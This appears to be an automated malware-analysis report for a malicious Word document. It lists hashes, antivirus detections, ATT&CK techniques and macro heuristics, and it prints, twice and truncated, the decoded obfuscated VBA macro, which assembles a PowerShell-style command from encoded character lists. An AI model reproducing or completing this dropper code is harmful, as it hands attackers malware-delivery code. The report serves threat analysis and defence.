Office (OLE) malware analysis — malicious · f8947af4937b10fa

MALICIOUS

Office (OLE)

236.8 KB Created: 2018-06-26 23:13:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: 7087c2f67e7f72b350820da4e79a763a SHA-1: dd79ac2b1dd1893769e8fc4f41d86bbd5b8331ce SHA-256: f8947af4937b10fa3e0cead56ba0e4ffaafc3aaa6d8cde5a4949ee7f626a639f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro includes an AutoOpen function and a call to Shell(), indicating an attempt to execute arbitrary code. The ClamAV detection 'Doc.Dropper.Agent-6592510-0' further supports its malicious nature as a dropper. The macro's obfuscated string concatenation suggests it is assembling commands or URLs for payload delivery.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6592505-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6592505-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10936 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10936 bytes
SHA-256: `01534ac41ab46e120b0d000a9fd8fb972f3698ca55b7c9803080df09a608aceb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VzXlUfjBWuCDv" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "YNnqLIOdSZZ" Function wSRQpYrvX() On Error Resume Next UWbbH = mTIAji oGWMB = Sin(33136) afAHT = CDate(18198) LInZau = 4322 VwtAU = 46950 qwNEo = 44620 vhuMjm = "Hell " + " . " + Chr(40) + Chr(40) + "Va" + "ri" + "Abl" + "e 'M" + "dR" + "'" + Chr(41) + ".nAmE" + "[3,11,2]" + "-j" + "OIn''" aVmXw = WcaGjf jiErj = Sin(54080) AaiTTD = CDate(6330) QwNRPj = 40509 MwUNP = 9198 NlniND = 32066 NNOKSS = Chr(41) + Chr(40) + "-j" + "OIN" + Chr(40) + Chr(40) + " 44 " + ", " + "96 " + ", " + "68" + ", 70 ," + "53, 10" + "2,109," CdEvNY = JifWw jYBnGv = Sin(5102) fjScJ = CDate(38993) AjiqDM = 49775 ujNNm = 92522 BrvWhl = 25309 OkafqpkzNB = " 12" + "7,37" + " ,103" + ",106" + " ,9" + "8," + "109, 10" + "7 , 12" + "4, 4" + "0 " VbMmH = ribcja jGEzsA = Sin(8480) MtIuUo = CDate(95897) ojGiws = 67072 pPJDj = 19033 iiqwz = 56563 ERJWVo = ",70,1" + "09,124 " + ",3" + "8 ,95" + " , 10" + "9,1" + "06 ,75 " + ",100" + ", 97 ,1" + "09,10" zOSiGR = GzzKb mjkiqS = Sin(95919) hZYukC = CDate(93870) zctaKz = 31667 nEJcrY = 18131 fnZFw = 43126 IMjFECfFZNr = "2,124, 5" + "1 ,4" + "4,123" + " , 98,78" + ",53 ,4" + "7 " + ",96 ,124" + " , 124 ," + " 120," + " 5" + "0 ," LbTwu = qmhIh owVFo = Sin(72122) OYHWT = CDate(5649) dVTUp = 38317 sfZbM = 70866 OPblF = 63923 hPqFbjYqp = " 39 ," + " 39 ," + "127 ,12" + "7,127" + " ,38,10" + "0, 108," + "111" + ",122,10" + "5 " + ", 120,9" + "6,9" + "7, 107," FBkNnf = pmzHOn sipJC = Sin(49012) wlsBFq = CDate(48158) rmrmC = 65207 qUPmi = 71288 rQbTw = 3998 zBwwur = " 108" + " , 10" + "9, " + "123 ," + "97,111 " + ",102 ," + " 3" + "8 ," + " 107 ," + "103,101 " SGfhO = UbJubw hOdBX = Sin(36671) DXrUP = CDate(32425) HOEPHz = 42117 jSqLbE = 24118 JwLNh = 90600 NwlkiUIb = ",39" + ", 120,7" + "1 , 122" + ", 75 ,10" + "6 ,76 " + ", 39,7" + "2,9" + "6 ," + " 124,12" + "4 ," + "120" tBZEq = APUGKU fwwVO = Sin(69228) MDzjnX = CDate(76479) sKPci = 96478 voWNfO = 35586 tuRZZ = 70104 bjbHfi = " , 50,39" + ", " + "39 ," + " 12" + "7,127 ,1" + "27 ,38," + " 98, " + "102, 1" pDwLVF = MYcNaj CkRvbm = Sin(13265) XCOhjq = CDate(46778) kKuwX = 96271 cszOH = 71410 IoGkG = 64935 RWzzwFdJ = "27 , " + "62, 62" + ",48 ,38" + ", 107,1" + "03 ,10" + "1," + " 39," MQQfMK = wOUuK SCGIh = Sin(92875) iLGuk = CDate(42441) ZwEfc = 41554 VYAXE = 78522 KSwzQM = 33818 MNITT = " 122," + " 73, 7" + "3 " + ", 70" + ",123 " + ", 101,79" + ", 49 ," + "39 , " + "72 ," wSRQpYrvX = vhuMjm + NNOKSS + OkafqpkzNB + ERJWVo + IMjFECfFZNr + hPqFbjYqp + zBwwur + NwlkiUIb + bjbHfi + RWzzwFdJ + MNITT OqUvQ = Sin(38923) ANmjk = 87843 nqWcvw = 41737 stdLOm = CDate(92044) zHOPE = qsPIIV iLOlcr = 9666 End Function Function UtPPP() On Error Resume Next CXjNM = Sin(75503) mPsaow = 2462 zfqBrs = 70375 GwJfAF = CDate(39670) soTKQ = nImUjB naNKP = 43197 QZoQLdNpK = "96" + " ,124 ," + "124, 12" + "0, " + "50, 3" + "9 ,39 " + ",127 ,12" + "7 ,127 ," + "38 , 108" + " , 97 " + ", 107" + ", 96" vzMmXX = Sin(13498) uFujw = 78719 AkVmf = 12306 lDjOH = CDate(56750) QZcJDM = SSYGaF nToiM = 38243 ocqzwwlzNX = " ,126, " + "125" + " , 124," + " 105, 97" + " ,107" + ", 96 ," + " 9" + "7 ," + "102," + " 9" + "6 ," HQvpJr = Sin(19515) HufOKG = 73234 kuzLnJ = 55313 CIrSi = CDate(63284) BlVOP = GWYGCX MUCiH = 62276 OUIJCwCF = " 38, 97" + ",10" + "2 ," + "110 ," + "10" + "3 ,39" + ", 68,71" hohBi = Sin(68589) IFGVv = 49725 ZQODDj = 79138 QFVDMt = CDate(65465) jCZDVH = JaGMiP KMNiB = 37419 UMHWw = " ,76" + " , " + "59,10" + "6," + "101" + ",56" + ", 39 ,72" rNozov = Sin(4547) FzRCzs = 86607 GGrfID = 74137 GEGEfN = CDate(82648) tGcHmL = RXwCtR dkYSwH = 17333 WTjQYQQY = ", 96" + ",1" + "24, 124," + "120 , 5" + "0 , 39,3" + "9,127,1" + "27" + ", 127" + ", " jGCLQC = Sin(311 ... (truncated)

SHA-256: 01534ac41ab46e120b0d000a9fd8fb972f3698ca55b7c9803080df09a608aceb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VzXlUfjBWuCDv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "YNnqLIOdSZZ"
Function wSRQpYrvX()
On Error Resume Next
UWbbH = mTIAji
oGWMB = Sin(33136)
afAHT = CDate(18198)
LInZau = 4322
VwtAU = 46950
qwNEo = 44620
vhuMjm = "Hell " + " . " + Chr(40) + Chr(40) + "Va" + "ri" + "Abl" + "e '*M" + "dR" + "*'" + Chr(41) + ".nAmE" + "[3,11,2]" + "-j" + "OIn''"
aVmXw = WcaGjf
jiErj = Sin(54080)
AaiTTD = CDate(6330)
QwNRPj = 40509
MwUNP = 9198
NlniND = 32066
NNOKSS = Chr(41) + Chr(40) + "-j" + "OIN" + Chr(40) + Chr(40) + " 44 " + ", " + "96 " + ", " + "68" + ", 70 ," + "53, 10" + "2,109,"
CdEvNY = JifWw
jYBnGv = Sin(5102)
fjScJ = CDate(38993)
AjiqDM = 49775
ujNNm = 92522
BrvWhl = 25309
OkafqpkzNB = " 12" + "7,37" + " ,103" + ",106" + " ,9" + "8," + "109, 10" + "7 , 12" + "4, 4" + "0 "
VbMmH = ribcja
jGEzsA = Sin(8480)
MtIuUo = CDate(95897)
ojGiws = 67072
pPJDj = 19033
iiqwz = 56563
ERJWVo = ",70,1" + "09,124 " + ",3" + "8 ,95" + " , 10" + "9,1" + "06 ,75 " + ",100" + ", 97 ,1" + "09,10"
zOSiGR = GzzKb
mjkiqS = Sin(95919)
hZYukC = CDate(93870)
zctaKz = 31667
nEJcrY = 18131
fnZFw = 43126
IMjFECfFZNr = "2,124, 5" + "1 ,4" + "4,123" + " , 98,78" + ",53 ,4" + "7 " + ",96 ,124" + " , 124 ," + " 120," + " 5" + "0 ,"
LbTwu = qmhIh
owVFo = Sin(72122)
OYHWT = CDate(5649)
dVTUp = 38317
sfZbM = 70866
OPblF = 63923
hPqFbjYqp = " 39 ," + " 39 ," + "127 ,12" + "7,127" + " ,38,10" + "0, 108," + "111" + ",122,10" + "5 " + ", 120,9" + "6,9" + "7, 107,"
FBkNnf = pmzHOn
sipJC = Sin(49012)
wlsBFq = CDate(48158)
rmrmC = 65207
qUPmi = 71288
rQbTw = 3998
zBwwur = " 108" + " , 10" + "9, " + "123 ," + "97,111 " + ",102 ," + " 3" + "8 ," + " 107 ," + "103,101 "
SGfhO = UbJubw
hOdBX = Sin(36671)
DXrUP = CDate(32425)
HOEPHz = 42117
jSqLbE = 24118
JwLNh = 90600
NwlkiUIb = ",39" + ", 120,7" + "1 , 122" + ", 75 ,10" + "6 ,76 " + ", 39,7" + "2,9" + "6 ," + " 124,12" + "4 ," + "120"
tBZEq = APUGKU
fwwVO = Sin(69228)
MDzjnX = CDate(76479)
sKPci = 96478
voWNfO = 35586
tuRZZ = 70104
bjbHfi = " , 50,39" + ", " + "39 ," + " 12" + "7,127 ,1" + "27 ,38," + " 98, " + "102, 1"
pDwLVF = MYcNaj
CkRvbm = Sin(13265)
XCOhjq = CDate(46778)
kKuwX = 96271
cszOH = 71410
IoGkG = 64935
RWzzwFdJ = "27 , " + "62, 62" + ",48 ,38" + ", 107,1" + "03 ,10" + "1," + " 39,"
MQQfMK = wOUuK
SCGIh = Sin(92875)
iLGuk = CDate(42441)
ZwEfc = 41554
VYAXE = 78522
KSwzQM = 33818
MNITT = " 122," + " 73, 7" + "3 " + ", 70" + ",123 " + ", 101,79" + ", 49 ," + "39 , " + "72 ,"
wSRQpYrvX = vhuMjm + NNOKSS + OkafqpkzNB + ERJWVo + IMjFECfFZNr + hPqFbjYqp + zBwwur + NwlkiUIb + bjbHfi + RWzzwFdJ + MNITT
OqUvQ = Sin(38923)
ANmjk = 87843
nqWcvw = 41737
stdLOm = CDate(92044)
zHOPE = qsPIIV
iLOlcr = 9666
End Function
Function UtPPP()
On Error Resume Next
CXjNM = Sin(75503)
mPsaow = 2462
zfqBrs = 70375
GwJfAF = CDate(39670)
soTKQ = nImUjB
naNKP = 43197
QZoQLdNpK = "96" + " ,124 ," + "124, 12" + "0, " + "50, 3" + "9 ,39 " + ",127 ,12" + "7 ,127 ," + "38 , 108" + " , 97 " + ", 107" + ", 96"
vzMmXX = Sin(13498)
uFujw = 78719
AkVmf = 12306
lDjOH = CDate(56750)
QZcJDM = SSYGaF
nToiM = 38243
ocqzwwlzNX = " ,126, " + "125" + " , 124," + " 105, 97" + " ,107" + ", 96 ," + " 9" + "7 ," + "102," + " 9" + "6 ,"
HQvpJr = Sin(19515)
HufOKG = 73234
kuzLnJ = 55313
CIrSi = CDate(63284)
BlVOP = GWYGCX
MUCiH = 62276
OUIJCwCF = " 38, 97" + ",10" + "2 ," + "110 ," + "10" + "3 ,39" + ", 68,71"
hohBi = Sin(68589)
IFGVv = 49725
ZQODDj = 79138
QFVDMt = CDate(65465)
jCZDVH = JaGMiP
KMNiB = 37419
UMHWw = " ,76" + " , " + "59,10" + "6," + "101" + ",56" + ", 39 ,72"
rNozov = Sin(4547)
FzRCzs = 86607
GGrfID = 74137
GEGEfN = CDate(82648)
tGcHmL = RXwCtR
dkYSwH = 17333
WTjQYQQY = ", 96" + ",1" + "24, 124," + "120 , 5" + "0 , 39,3" + "9,127,1" + "27" + ", 127" + ", "
jGCLQC = Sin(311
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.